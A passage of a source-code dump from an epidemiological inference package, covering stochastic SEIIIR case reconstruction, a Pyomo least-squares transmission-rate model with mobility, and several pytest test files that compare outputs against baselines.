reported cases\n n_timesteps = (n_r_days+padding_days)*n_steps_per_day\n tcases_timestep = np.zeros((n_timesteps,n_counties))\n\n # probability of confirmation of case - reporting fraction\n # this should be drawn from a distribution as well if good data exists\n p = 1 / reporting_multiplier\n\n # loop through each day and draw the total number of cases that day\n # from the reported cases and the reporting fraction\n # These are the total number of cases that could be reportable\n for r_day in range(len(dates)):\n r_timestep = r_day*n_steps_per_day\n reported_cases = reported_cases_per_day[r_day,:]\n #foo = np.random.negative_binomial([100,10000], p=0.1, size=(1000,2))\n # loop over each of the counties\n for c, cname in enumerate(counties):\n if reported_cases[c] > 0:\n # draw the total number of reportable cases\n reportable_cases_day = int(reported_cases[c] + np.random.negative_binomial(reported_cases[c],p))\n if reportable_cases_day > 0:\n # now draw the delays from infection to confirmation (log normal)\n # one delay is drawn for each reportable case and is in units of days\n if reporting_delay_dev is None:\n # used for testing against simulated data\n delays_days = reporting_delay_mean*np.ones(reportable_cases_day)\n # convert to timesteps instead of days\n delays_days = n_steps_per_day*delay_days\n else:\n delays_days = np.random.lognormal(mean=np.log(reporting_delay_mean), sigma=np.log(reporting_delay_dev), size=reportable_cases_day)\n # convert this to timesteps instead of days\n assert type(delays_days) is np.ndarray\n delays_timesteps = delays_days*n_steps_per_day\n # round to integer timestep\n delays_timesteps = np.round(delays_timesteps).astype(int)\n # add one transmission (infection) based on each reportable case and its delay\n for delay_timestep in delays_timesteps:\n tcases_timestep[r_timestep - delay_timestep + padding_timesteps,c] += 1\n\n # truncate days off of the transmissions\n # since we don't yet have the reported cases to estimate this appropriately\n t_daily_dates = np.asarray([dates[0] + timedelta(days=i) for i in range(-padding_days, n_r_days-1.64*reporting_delay_mean)],dtype=object)\n tcases_timestep = tcases_timestep[:-1.64*reporting_delay_mean*n_steps_per_day,:]\n n_timesteps = len(tcases_timestep)\n \n # create arrays to store compartment numbers\n S = np.zeros((n_timesteps,len(counties)), dtype=int)\n E = np.zeros((n_timesteps,len(counties)), dtype=int)\n I1 = np.zeros((n_timesteps,len(counties)), dtype=int)\n I2 = np.zeros((n_timesteps,len(counties)), dtype=int)\n I3 = np.zeros((n_timesteps,len(counties)), dtype=int)\n R = np.zeros((n_timesteps,len(counties)), dtype=int)\n\n # assume fully susceptible population to start\n S[0,:] = populations\n E[0,:] = 0\n I1[0,:] = 0\n I2[0,:] = 0\n I3[0,:] = 0\n R[0,:] = 0\n\n # Approach 1:\n # - sigma is fixed at 1/5.2 days\n # - serial interval is drawn from uniform 6.5-8.2, and used\n # to compute gamma\n # It might be better to just draw sigma and gamma from separate\n # distributions here.\n # Here, the serial interval is drawn once and that value is used\n # for the entire simulation, however, it could be drawn for each day\n # as well.\n # Note: These are drawn for every day, but they are the same for each day\n # - this is done so the code is ready for different values on each day if\n # we decide to do that.\n sigma = 1.0/fixed_incubation # units of days\n infectious_period = np.random.uniform(infectious_lower, infectious_upper)*np.ones(len(tcases_timestep)) # CDL, size=len(tcases_timestep))\n gamma = np.reciprocal(infectious_period)\n #incubation = np.random.exponential(scale=mean_incubation, size=len(tcases))\n # CDL serial_interval = np.random.uniform(6.35, 8.05)*np.ones(len(tcases_timestep))\n #serial_interval = np.random.uniform(6.5, 8.2)*np.ones(len(tcases_timestep))\n # compute gamma = 1/ ( 2*(SI-1/sigma) )\n #temp = np.copy(sigma)\n #np.reciprocal(temp, out=temp)\n #temp = 2*(serial_interval-temp)\n #gamma = np.reciprocal(temp)\n \n prob_E = 1-np.exp(-1.0/n_steps_per_day*sigma)\n prob_III = 1-np.exp(-1.0/n_steps_per_day*3*gamma)\n\n # loop through all of the days and compute the compartments\n # with the stochastic simulations\n for t in range(len(tcases_timestep)-1):\n Stout = tcases_timestep[t,:]\n if np.any(Stout >= S[t,:]):\n # reconstruction indicates the number of infections\n # exceed the population - flag this for error reporting\n # means the reported cases or reporting factor are too large\n # for the population value specified\n # Todo: flag a warning\n print(\"WARNING: cases exceeded population size. Ignoring cases that exceed population size.\")\n Stout = np.minimum(Stout, S[t,:])\n \n S[t+1,:] = S[t,:] - Stout\n Etout = np.random.binomial(E[t,:], prob_E, size=n_counties)\n E[t+1,:] = E[t,:] + Stout - Etout\n I1tout = np.random.binomial(I1[t,:], prob_III[t], size=n_counties)\n I1[t+1,:] = I1[t,:] + Etout - I1tout\n I2tout = np.random.binomial(I2[t,:], prob_III[t], size=n_counties)\n I2[t+1,:] = I2[t,:] + I1tout - I2tout\n I3tout = np.random.binomial(I3[t,:], prob_III[t], size=n_counties)\n I3[t+1,:] = I3[t,:] + I2tout - I3tout\n R[t+1,:] = R[t,:] + I3tout\n\n # now bring these vectors back to days\n timesteps_days = [t for t in range(len(S)) if t % n_steps_per_day == 0] \n S = S[timesteps_days]\n E = E[timesteps_days]\n I1 = I1[timesteps_days]\n I2 = I2[timesteps_days]\n I3 = I3[timesteps_days]\n R = R[timesteps_days]\n T = np.zeros((len(t_daily_dates)+1, n_counties))\n T[1:] = np.cumsum(tcases_timestep, axis=0)[timesteps_days]\n T = np.diff(T, axis=0)\n assert len(t_daily_dates) == T.shape[0]\n assert n_counties == T.shape[1]\n assert len(t_daily_dates) == S.shape[0]\n assert n_counties == S.shape[1]\n\n assert np.any(np.isfinite(S))\n assert np.any(np.isfinite(E))\n assert np.any(np.isfinite(I1))\n assert np.any(np.isfinite(I2))\n assert np.any(np.isfinite(I3))\n assert np.any(np.isfinite(R))\n assert np.any(np.isfinite(T))\n \n return Bunch(dates=t_daily_dates, counties=counties, S=S, E=E, I1=I1, I2=I2, I3=I3, R=R, transmissions=T)\n" }, { "alpha_fraction": 0.6180124282836914, "alphanum_fraction": 0.6195651888847351, "avg_line_length": 32.30172348022461, "blob_id": "5d61f8f57c0e14f130122e0049718b10dbb259a5", "content_id": "9e8ca25cc0d647840a2889545c9f45f179e0c471", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3864, "license_type": "no_license", "max_line_length": 184, "num_lines": 116, "path": "/epi_inference/reconstruction/recon_deterministic_delay_wf.py", "repo_name": "or-fusion/epi_inference", "src_encoding": "UTF-8", "text": "__all__ = ['run']\n\nimport sys\nimport datetime\nimport pandas as pd\nfrom pyutilib.misc import timing\n\nfrom ..engine.task import Task\nfrom ..engine.task_registry import register_task\nfrom ..engine.misc import save_metadata\n\nfrom ..util import load_population, save_results\nfrom ..collect.misc import load_collect\nfrom ..reconstruction.deterministic import reconstruct_states_deterministic_decay\nfrom ..reconstruction.common import reported_cases_from_cumulative\n\n\ndef run_county(county, df, population, CONFIG, warnings):\n #\n # Initialize results dictionary\n #\n results = {'FIPS':county}\n for key, value in CONFIG.get('factor_levels',{}).items():\n if not key in results:\n results[key] = value\n #\n # Get the cumulative cases\n #\n cumulative_reported_cases = df[county].to_list()\n\n # reconstruct the states\n Cdates = [datetime.date.fromisoformat(day) for day in df.index.to_list()]\n reported_cases_per_day = \\\n reported_cases_from_cumulative(dates=Cdates,\n cumulative_reported_cases=cumulative_reported_cases)\n\n res = reconstruct_states_deterministic_decay(dates=reported_cases_per_day.dates,\n reported_cases_per_day=reported_cases_per_day.values,\n population=population,\n sigma=CONFIG['sigma'],\n gamma=CONFIG['gamma'],\n reporting_factor=CONFIG['reporting_factor'],\n report_delay=CONFIG['deltaP'],\n county=county,\n warnings=warnings)\n\n # TODO - keep rdates and rcases?\n #results['rdates'] = reported_cases_per_day.dates\n #results['rcases'] = reported_cases_per_day.values\n results['dates'] = res.dates\n results['transmissions'] = res.transmissions\n results['S'] = res.S\n results['E'] = res.E\n results['I1'] = res.I1\n results['I2'] = res.I2\n results['I3'] = res.I3\n results['R'] = res.R\n results['population'] = population\n results['orig_rep_cases'] = res.orig_rep_cases\n\n return results\n\n\ndef run(CONFIG, warnings):\n #\n # Load the population data\n #\n population_df = load_population(CONFIG['population_csv']['file'], CONFIG['population_csv']['index'])\n #\n # Load the case data \n #\n df = load_collect(CONFIG['input_csv'])\n #\n # Perform construction\n #\n results = {}\n if 'county' in CONFIG:\n counties = [CONFIG['county']]\n else:\n counties = df.keys()\n\n if CONFIG['verbose']:\n timing.tic()\n for t in counties:\n if t not in population_df[CONFIG['population_csv']['population']]:\n warnings.append(\"WARNING: county %s does not have population data available\" % str(t))\n continue\n results[t] = run_county(t, df, population_df[CONFIG['population_csv']['population']][t], CONFIG, warnings)\n if CONFIG['verbose']:\n timing.toc(\"Serial Execution\")\n #\n # Save results\n #\n save_results(results, CONFIG['output_json'])\n save_metadata(CONFIG, warnings)\n\n\nclass ReconstructionDeterministicDelay(Task):\n\n def __init__(self):\n Task.__init__(self, \"reconstruction_deterministic_delay\",\n \"Perform compartment reconstruction using a deterministic delay.\")\n\n def validate(self, CONFIG):\n valid_options = set(['sigma', 'gamma', 'reporting_factor', 'deltaP', 'population_csv', 'input_csv', 'county', 'output_json', 'verbose', 'factors', 'factor_levels', 'workflow'])\n for key in CONFIG:\n if key not in valid_options:\n raise RuntimeError(\"Unexpected configuration option: '%s'\" % key)\n\n def run(self, data, CONFIG):\n self._warnings = []\n self.validate(CONFIG)\n run(CONFIG, self._warnings)\n\n\nregister_task(ReconstructionDeterministicDelay())\n\n" }, { "alpha_fraction": 0.6059779524803162, "alphanum_fraction": 0.6121791005134583, "avg_line_length": 38.71428680419922, "blob_id": "906e6640403adeb549c091db4f63d41c773e35a1", "content_id": "199d3c441458c893cb70ef3197b55a670634c987", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 8063, "license_type": "no_license", "max_line_length": 220, "num_lines": 203, "path": "/epi_inference/formulations/multinode_mobility_window_decay_lsq_old.py", "repo_name": "or-fusion/epi_inference", "src_encoding": "UTF-8", "text": "__all__ = ['run_multinode_mobility_window_decay_lsq_old']\n\nimport pyutilib.misc.timing as timing\nimport pyomo.environ as pe\nfrom pyomo.environ import SolverFactory, value\nfrom pyomo.opt import check_optimal_termination\n\n\ndef run_multinode_mobility_window_decay_lsq_old(*, recon, mobility, analysis_window, verbose=False):\n \"\"\"\n This function solves the least-squares inference inference formulation\n using the decay-based reconstruction function.\n\n Parameters\n ----------\n recon : dict()\n A dictionary with reconstruction data, indexed by FIPS codes for US counties.\n analysis_window : dict or None\n This is a dictionary indicating the window of time that should be used \n in the objective function. If None, then the full set of data will be used.\n The key \"days\" indicates the number of days from the end of the data that \n should be used in the objective function.\n verbose : bool\n If true, then more output is printed to the console when the analysis is run\n \"\"\"\n # create the Pyomo optimization formulation\n m = create_inference_window_formulation(\n recon=recon,\n mobility=mobility,\n analysis_window=analysis_window,\n verbose=verbose\n )\n\n # call the solver\n timing.tic('Starting timer for solver')\n solver = SolverFactory('ipopt')\n solver.options['tol']=1e-8\n status = solver.solve(m)\n timing.toc('Finished solver')\n\n # Check that the solve completed successfully\n if check_optimal_termination(status) == False:\n return {'est_beta': None, 'status': 'failed', 'msg': 'Unknown solver error.'}\n\n results = list()\n for i in m.NODES:\n for w in m.WINDOWS:\n d = dict()\n d['date'] = m.DATES[w]\n d['window_days'] = m.window_days\n if m.beta[i,w].stale == True:\n d['est_beta'] = None\n d['status'] = 'stale'\n else:\n d['est_beta'] = value(m.beta[i,w])\n d['status'] = 'ok'\n d['population'] = recon[i]['population']\n d['infections_in_window'] = m.window_transmissions[i][w]\n d['FIPS'] = i\n results.append(d)\n\n return {'results': results}\n\n\ndef create_inference_window_formulation(*, recon, mobility, analysis_window, verbose=False):\n \"\"\"\n Creates a one-step-ahead inference model using a decay\n model with 3 I compartments. The model is written in terms of absolute\n numbers of cases (not ln-transform). The model combines estimates across\n multiple time series, one for each node.\n\n Parameters\n ----------\n analysis_window : dict or None\n This is a dictionary indicating the window of time that should be used \n in the objective function. If None, then the full set of data will be used.\n The key \"days\" indicates the number of days from the end of the data that \n should be used in the objective function.\n\n \"\"\"\n window = int(analysis_window.get('days',14))\n assert(window >= 1)\n\n timing.tic('Starting timer for model construction')\n model = pe.ConcreteModel()\n\n # Cached data\n #model.sigma = sigma\n #model.gamma_1 = gamma_1\n #model.gamma_2 = gamma_2\n #model.gamma_3 = gamma_3\n model.eta = 0.5 # fraction of the day spent \"away\"\n #model.report_delay = report_delay\n #model.reporting_factor = reporting_factor\n #model.delta_beta_regu = 1e-4\n\n model.NODES = pe.Set(initialize=list(k for k in recon.keys()))\n\n model.mobility = dict(mobility)\n model.MOBILITY_TUPLES = list()\n for i in model.NODES:\n if i not in model.mobility:\n model.mobility[i] = {}\n for j in model.mobility[i]:\n if i in model.NODES and j in model.NODES:\n model.MOBILITY_TUPLES.append((i,j))\n \n model.T_data = dict()\n model.I_data = dict()\n model.S_data = dict()\n model.populations = dict()\n for nodeid in model.NODES:\n #model.populations[nodeid] = float(populations[nodeid]) # overall population\n #cm_rep_cases_node = [v for v in cumulative_reported_cases[nodeid].values]\n #\n #rdates, rcases, dates, T, S, E, I1, I2, I3, R = \\\n # recon.reconstruct_states_deterministic_decay(\n # Cdates=Cdates,\n # cumulative_reported_cases=cm_rep_cases_node,\n # population=model.populations[nodeid],\n # sigma=sigma,\n # gamma=gamma_1/3,\n # reporting_factor=reporting_factor,\n # report_delay=report_delay\n # )\n model.T_data[nodeid] = recon[nodeid]['transmissions']\n model.I_data[nodeid] = dict()\n model.I_data[nodeid]['I1'] = recon[nodeid]['I1']\n model.I_data[nodeid]['I2'] = recon[nodeid]['I2']\n model.I_data[nodeid]['I3'] = recon[nodeid]['I3']\n model.S_data[nodeid] = recon[nodeid]['S']\n \n model.populations[nodeid] = recon[nodeid]['population']\n\n if not hasattr(model, 'TIMES'):\n model.TIMES = pe.Set(initialize=[i for i in range(len(recon[nodeid]['transmissions']))], ordered=True)\n if not hasattr(model, 'DATES'):\n model.DATES = recon[nodeid][\"dates\"]\n timing.toc('setup population and mobility information')\n\n # define the tuples for the windows\n model.WINDOWS = list()\n model.WINDOW_TIMES = list()\n model.window_days = window\n for i in range(len(model.TIMES)):\n if i % 7 != 0:\n continue\n if i < model.window_days:\n continue\n for j in range(i+1-model.window_days, i+1):\n model.WINDOW_TIMES.append((i,j)) \n model.WINDOWS.append(i)\n timing.toc('built windows')\n\n # get the approximate transmissions over the window period\n model.window_transmissions = dict()\n for i in model.NODES:\n d = dict()\n for w in model.WINDOWS:\n d[w] = sum(model.T_data[i][t] for ww,t in model.WINDOW_TIMES if ww == w)\n model.window_transmissions[i] = d\n #print(WINDOWS)\n #for t in WINDOW_TIMES:\n # print(t)\n #quit()\n \n model.beta = pe.Var(model.NODES, model.WINDOWS, initialize=1.0, bounds=(0,None)) # transmission parameter\n # for now, alpha is not used\n # model.alpha = pe.Var(initialize=1.0)\n # model.alpha.fix(1.0)\n\n # define the variable for estimated transmissions\n model.T_hat = pe.Var(model.NODES, model.WINDOW_TIMES, initialize=1.0)\n timing.toc('built variables')\n # infection process\n def _infection_process(m, i, w, t):\n percent_mobile = 0\n if i in m.mobility:\n percent_mobile = sum(m.mobility[i][j]/m.populations[i] for j in m.mobility[i] if j in m.NODES)\n\n return m.T_hat[i,w,t] == m.beta[i,w] * (m.I_data[i]['I1'][t] + m.I_data[i]['I2'][t] + m.I_data[i]['I3'][t]) / m.populations[i] * m.S_data[i][t] * (1-m.eta*percent_mobile) \\\n + sum(m.beta[j,w] * (m.I_data[j]['I1'][t] + m.I_data[j]['I2'][t] + m.I_data[j]['I3'][t]) / m.populations[j] * m.S_data[i][t] * (m.eta*m.mobility[i][j]/m.populations[i]) for j in m.mobility[i] if j in m.NODES)\n\n model.infection_process = pe.Constraint(model.NODES, model.WINDOW_TIMES, rule=_infection_process)\n timing.toc('built infection process')\n \"\"\"\n model.delta_beta = pe.Var(model.MOBILITY_TUPLES, model.WINDOWS)\n def _delta_beta_con(m, i, j, w):\n return m.delta_beta[i,j,w] == m.beta[i,w] - m.beta[j,w]\n model.delta_beta_con = pe.Constraint(model.MOBILITY_TUPLES, model.WINDOWS, rule=_delta_beta_con)\n \"\"\"\n # least squares objective function\n def _lse(m, i):\n return sum( (m.T_hat[i,w,t] - m.T_data[i][t])**2 for w,t in m.WINDOW_TIMES) #\\\n #+ m.delta_beta_regu*sum( m.mobility[i][j]*m.delta_beta[i,j,w]**2 for j in m.mobility[i] for w in m.WINDOWS if i in m.NODES and j in m.NODES)\n model.lse = pe.Expression(model.NODES, rule=_lse)\n\n def _total_lse(m):\n return sum( m.lse[i] for i in m.NODES )\n model.total_lse = pe.Objective(rule=_total_lse)\n timing.toc('built objective')\n\n return model\n\n" }, { "alpha_fraction": 0.5772432684898376, "alphanum_fraction": 0.6061517000198364, "avg_line_length": 27.4407901763916, "blob_id": "7770a9fb67d7aec92ee932a730c7be58519cf8ea", "content_id": "bb4ad6147267801555f71160856b9ebb0102f61d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4324, "license_type": "no_license", "max_line_length": 80, "num_lines": 152, "path": "/epi_inference/engine/tests/test_engine.py", "repo_name": "or-fusion/epi_inference", "src_encoding": "UTF-8", "text": "import pytest\nimport os\nimport os.path\nimport json\n\nfrom jsondiff import diff\nfrom pyomo.common import fileutils as fileutils\nfrom pyutilib.misc import Options as Options\nfrom epi_inference.engine import driver\nfrom epi_inference.engine.task import Task\nfrom epi_inference.engine.task_registry import register_task\n\n\ndef compare_json(output, gold, check_exact=False): # pragma: no cover\n with open(output,'r') as INPUT:\n outputdf = json.load(INPUT)\n with open(gold,'r') as INPUT:\n golddf = json.load(INPUT)\n d = diff(outputdf, golddf)\n if len(d) != 0:\n print('DIFFERENCES IN JSON')\n print(d)\n assert(len(d) == 0)\n return outputdf, golddf\n\n\nclass Task1(Task):\n\n def __init__(self):\n Task.__init__(self, 'task1', \"A task used for testing\")\n\n def run(self, data, args):\n with open(args['output'], \"w\") as OUTPUT:\n json.dump(args, OUTPUT)\n\nregister_task(Task1())\n\n\nclass TestEngine():\n @classmethod\n def setup_class(cls):\n cls._origdir = os.getcwd()\n thisfiledir = fileutils.this_file_dir()\n os.chdir(thisfiledir)\n\n @classmethod\n def teardown_class(cls):\n os.chdir(cls._origdir)\n\n def test_test1(self):\n args = Options()\n args.block = 'test1'\n args.config_file = 'tests1.yml'\n args.verbose = True\n driver.run(args)\n\n compare_json('test1_output1.json', 'test1_baseline1.json')\n os.remove('test1_output1.json')\n\n compare_json('test1_output2.json', 'test1_baseline2.json')\n os.remove('test1_output2.json')\n\n def test_test2(self):\n args = Options()\n args.block = 'test2'\n args.config_file = 'tests1.yml'\n args.verbose = True\n driver.run(args)\n\n compare_json('test2_output1.json', 'test2_baseline1.json')\n os.remove('test2_output1.json')\n\n def test_test3(self):\n args = Options()\n args.block = 'test3'\n args.config_file = 'tests1.yml'\n args.verbose = True\n driver.run(args)\n\n compare_json('test1_output1.json', 'test1_baseline1.json')\n os.remove('test1_output1.json')\n\n compare_json('test1_output2.json', 'test1_baseline2.json')\n os.remove('test1_output2.json')\n\n compare_json('test2_output1.json', 'test2_baseline1.json')\n os.remove('test2_output1.json')\n\n def test_test4(self):\n args = Options()\n args.block = 'test4'\n args.config_file = 'tests1.yml'\n args.verbose = True\n driver.run(args)\n\n compare_json('test1_output1.json', 'test1_baseline1.json')\n os.remove('test1_output1.json')\n\n compare_json('test1_output2.json', 'test1_baseline2.json')\n os.remove('test1_output2.json')\n\n compare_json('test2_output1.json', 'test2_baseline1.json')\n os.remove('test2_output1.json')\n\n def test_test5(self):\n args = Options()\n args.block = 'test5'\n args.config_file = 'tests1.yml'\n args.verbose = True\n driver.run(args)\n\n compare_json('test1_output1.json', 'test1_baseline1.json')\n os.remove('test1_output1.json')\n\n compare_json('test1_output2.json', 'test1_baseline2.json')\n os.remove('test1_output2.json')\n\n compare_json('test2_output1.json', 'test2_baseline1.json')\n os.remove('test2_output1.json')\n\n def test_test6(self):\n args = Options()\n args.block = 'test6'\n args.config_file = 'tests2.yml'\n args.verbose = True\n driver.run(args)\n\n compare_json('test6_output1.json', 'test6_baseline1.json')\n os.remove('test6_output1.json')\n\n compare_json('test6_output2.json', 'test6_baseline2.json')\n os.remove('test6_output2.json')\n\n def test_test7(self):\n args = Options()\n args.block = 'test7'\n args.config_file = 'tests3.yml'\n args.verbose = True\n driver.run(args)\n\n compare_json('test7_output1.json', 'test7_baseline1.json')\n os.remove('test7_output1.json')\n\n def test_test8(self):\n args = Options()\n args.block = 'test8'\n args.config_file = 'tests4.yml'\n args.verbose = True\n driver.run(args)\n\n compare_json('test8_output1.json', 'test8_baseline1.json')\n os.remove('test8_output1.json')\n\n" }, { "alpha_fraction": 0.5690353512763977, "alphanum_fraction": 0.6108247637748718, "avg_line_length": 43.162601470947266, "blob_id": "e9489673080f14168e50dbe9d124a4ef8a2e9f65", "content_id": "10807ef57c38d3c6d9b883e341c7213b75ab8a47", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5432, "license_type": "no_license", "max_line_length": 116, "num_lines": 123, "path": "/epi_inference/ATTIC/tests/bad_end_to_end.py", "repo_name": "or-fusion/epi_inference", "src_encoding": "UTF-8", "text": "import pytest\nimport subprocess\nimport os\nimport os.path\nimport json\nimport pandas as pd\nimport numpy as np\n\nfrom pyomo.common import fileutils as fileutils\n\ndef _cleanup_output(files):\n for f in files:\n if os.path.isfile(f):\n os.remove(f)\n\nclass TestEndToEnd():\n\n @classmethod\n def setup_class(cls):\n cls._origdir = os.getcwd()\n thisfiledir = fileutils.this_file_dir()\n os.chdir(thisfiledir)\n\n @classmethod\n def teardown_class(cls):\n os.chdir(cls._origdir)\n\n def test_inference_simulated_county_different_beta(self):\n # list of expected output files for cleanup\n expected_output_files = ['./output/results_inference_simulated_county_different_beta.csv',\n './output/results_inference_simulated_county_different_beta_meta.yml']\n\n # cleanup any output that may be lingering from old runs\n _cleanup_output(expected_output_files)\n\n # execute epiinf\n cmd = ['epiinf', 'inference', './config_files/inference_simulated_county_different_beta.yml']\n subprocess.run(cmd)\n\n # read the output that was produced\n assert os.path.isfile('./output/results_inference_simulated_county_different_beta.csv')\n df = pd.read_csv('./output/results_inference_simulated_county_different_beta.csv', dtype={\"FIPS\":'str'})\n\n # expected output\n expected_df = {\"est_beta\": [0.25, 0.5, 0.75, 1.0, 1.25, 1.5],\n \"status\": ['ok' for i in range(6)],\n \"population\": [1000000]*6,\n \"total_cases\": [2.579078, 6.097038, 12.661745, 23.655522, 40.762154, 65.994705],\n \"FIPS\": ['025', '050', '075', '100', '125', '150']}\n expected_df = pd.DataFrame.from_dict(expected_df)\n\n # compare the estimated beta values\n pd.testing.assert_series_equal(left=df['est_beta'], right=expected_df['est_beta'], check_exact=False)\n pd.testing.assert_series_equal(left=df['total_cases'], right=expected_df['total_cases'], check_exact=False)\n pd.testing.assert_series_equal(left=df['status'], right=expected_df['status'], check_exact=False)\n\n # cleanup the output \n _cleanup_output(expected_output_files)\n\n def test_inference_simulated_county_different_beta_int(self):\n # list of expected output files for cleanup\n expected_output_files = ['./output/results_inference_simulated_county_different_beta_int.csv',\n './output/results_inference_simulated_county_different_beta_int_meta.yml']\n\n # cleanup any output that may be lingering from old runs\n _cleanup_output(expected_output_files)\n\n # execute epiinf\n cmd = ['epiinf', 'inference', './config_files/inference_simulated_county_different_beta_int.yml']\n subprocess.run(cmd)\n\n # read the output that was produced\n assert os.path.isfile('./output/results_inference_simulated_county_different_beta_int.csv')\n df = pd.read_csv('./output/results_inference_simulated_county_different_beta_int.csv', dtype={\"FIPS\":'str'})\n\n # expected output\n expected_df = {\"est_beta\": [0.256255, 0.507560, 0.802103, 1.015384, 1.271785, 1.480856],\n \"status\": ['ok' for i in range(6)],\n \"population\": [1000000]*6,\n \"total_cases\": [3.0, 6.0, 13.0, 24.0, 41.0, 66.0],\n \"FIPS\": ['025', '050', '075', '100', '125', '150']}\n expected_df = pd.DataFrame.from_dict(expected_df)\n\n # compare the produced output with the expected output\n pd.testing.assert_series_equal(left=df['est_beta'], right=expected_df['est_beta'], check_exact=False)\n pd.testing.assert_series_equal(left=df['total_cases'], right=expected_df['total_cases'], check_exact=False)\n pd.testing.assert_series_equal(left=df['status'], right=expected_df['status'], check_exact=False)\n\n # cleanup the output \n _cleanup_output(expected_output_files)\n\n def test_inference_florida_mobility(self):\n # list of expected output files for cleanup\n expected_output_files = ['./output/florida_inference_mobility_2.json',\n './output/florida_inference_mobility_2_meta.yml']\n\n # cleanup any output that may be lingering from old runs\n _cleanup_output(expected_output_files)\n\n # execute epiinf\n cmd = ['epiinf', 'inference', './config_files/florida_inference_mobility.yml']\n subprocess.run(cmd)\n\n # check that the output files were produced\n for f in expected_output_files:\n assert os.path.isfile(f)\n\n # read the json output\n with open('./output/florida_inference_mobility_2.json', 'r') as fd:\n data = json.load(fd)\n\n # loop over each run (different R0)\n expected_avg_beta = [1.36/4, 1.51/4, 1.81/4, 2.02/4, 2.17/4, 2.37/4, 2.55/4, 2.70/4]\n betas_by_r0 = [list()]*len(expected_avg_beta)\n for r, rd in enumerate(data):\n r0 = float(rd['R0'])\n for d in rd['results']:\n if d['total_cases'] > 20:\n betas_by_r0[r].append(d['est_beta'])\n avg_beta = sum(betas_by_r0[r])/len(betas_by_r0[r])\n print(avg_beta*4, r0)\n assert abs(expected_avg_beta[r] - avg_beta) <= 0.01*expected_avg_beta[r]\n assert abs(float(r0)-avg_beta*4) <= 0.1*r0\n" }, { "alpha_fraction": 0.5442670583724976, "alphanum_fraction": 0.569908082485199, "avg_line_length": 39.411766052246094, "blob_id": "d07d641be6b38da0b49aee1c549e62cafba33054", "content_id": "9a37214ac265d1617275e8d3578f1d374749cdca", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2067, "license_type": "no_license", "max_line_length": 136, "num_lines": 51, "path": "/epi_inference/ATTIC/tests/data/generate_data_files.py", "repo_name": "or-fusion/epi_inference", "src_encoding": "UTF-8", "text": "import pytest\nimport numpy as np\nimport pandas as pd\nimport csv\nfrom epi_inference.formulations.simulation import simulate_discrete_seiiir_deterministic\nfrom epi_inference.util import roundall\nfrom epi_inference.formulations.decay_lsq import run_decay_lsq\nfrom epi_inference.formulations.decay_blike import run_decay_blike\nfrom epi_inference.formulations.multinode_decay_lsq import run_multinode_decay_lsq\nimport matplotlib.pyplot as plt\n\ndef generate_datafile():\n \"\"\"\n Test the decay inference using data from a simulation with the seiiir deterministic model\n \"\"\"\n N = 1000000\n y0={'S': N, 'E': 0, 'I1': 0, 'I2': 0, 'I3':0, 'R': 0}\n sigma = 1/5\n gamma = 1/4\n rho = 1\n report_delay = 7\n tf = 25\n tx = [0]*tf\n tx[10] = 1\n\n dfdict = dict()\n dfpop = dict({'FIPS':[],'pop':[]})\n for beta in [0.25, 0.5, 0.75, 1.0, 1.25, 1.5]:\n Cdates,C,dates,T,S,E,I1,I2,I3,R = simulate_discrete_seiiir_deterministic(y0, tf, beta=beta,\n sigma=sigma, gamma=gamma,\n rho=rho, N=N,\n report_delay=report_delay,\n tx=tx)\n if len(dfdict) == 0:\n dfdict['Date'] = Cdates\n FIPSstr = '{:03d}'.format(int(100*beta))\n dfdict[FIPSstr] = C\n dfpop['FIPS'].append(FIPSstr)\n dfpop['pop'].append(N)\n\n dfC = pd.DataFrame(dfdict)\n dfC.to_csv('simulated_independent_county_different_beta.csv', index=False, quoting=csv.QUOTE_NONNUMERIC, date_format=\"%Y-%m-%d\")\n\n dfC = dfC.round()\n dfC.to_csv('simulated_independent_county_different_beta_int.csv', index=False, quoting=csv.QUOTE_NONNUMERIC, date_format=\"%Y-%m-%d\")\n\n dfP = pd.DataFrame(dfpop)\n dfP.to_csv('simulated_independent_county_different_beta_pop.csv', index=False, quoting=csv.QUOTE_NONNUMERIC)\n\nif __name__ == '__main__':\n generate_datafile()\n \n\n" }, { "alpha_fraction": 0.6298971772193909, "alphanum_fraction": 0.6985637545585632, "avg_line_length": 65.47457885742188, "blob_id": "9971c25f9e90b5fe915eb2285bd45a8afe5562a0", "content_id": "bef38e499d260e542fd34deee12bc9021c4383a6", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 11767, "license_type": "no_license", "max_line_length": 82, "num_lines": 177, "path": "/epi_inference/workflow/tests/test_inference_json2csv_by_county.py", "repo_name": "or-fusion/epi_inference", "src_encoding": "UTF-8", "text": "import pytest\nimport os\nimport os.path\nimport json\nimport yaml\nimport numpy as np\nimport pandas as pd\n\nfrom pyomo.common import fileutils as fileutils\nfrom pyutilib.misc import Options as Options\n\nfrom epi_inference.engine import driver\nfrom epi_inference.util import compare_json, compare_csv\n\nclass Test_Inference_JSON2CSV_By_County():\n @classmethod\n def setup_class(cls):\n # change to the test directory\n cls._origdir = os.getcwd()\n thisfiledir = fileutils.this_file_dir()\n rundir = os.path.join(thisfiledir, 'inference_json2csv_by_county')\n os.chdir(rundir)\n\n @classmethod\n def teardown_class(cls):\n # return to the previous directory\n os.chdir(cls._origdir)\n\n def test_inference_json2csv_by_county(self):\n args = Options()\n args.block = 'all'\n args.config_file = './workflows/inference_json2csv_by_county.yml'\n args.verbose = True\n driver.run(args)\n\n for f in csv_files():\n output_file = os.path.join('results', f)\n baseline_file = os.path.join('baseline', f) \n compare_csv(output_file, baseline_file)\n\ndef csv_files():\n ret = ['inference_json2csv_by_county/estimated_beta_county_12001.csv',\n 'inference_json2csv_by_county/estimated_beta_county_12003.csv',\n 'inference_json2csv_by_county/estimated_beta_county_12005.csv',\n 'inference_json2csv_by_county/estimated_beta_county_12007.csv',\n 'inference_json2csv_by_county/estimated_beta_county_12009.csv',\n 'inference_json2csv_by_county/estimated_beta_county_12011.csv',\n 'inference_json2csv_by_county/estimated_beta_county_12013.csv',\n 'inference_json2csv_by_county/estimated_beta_county_12015.csv',\n 'inference_json2csv_by_county/estimated_beta_county_12017.csv',\n 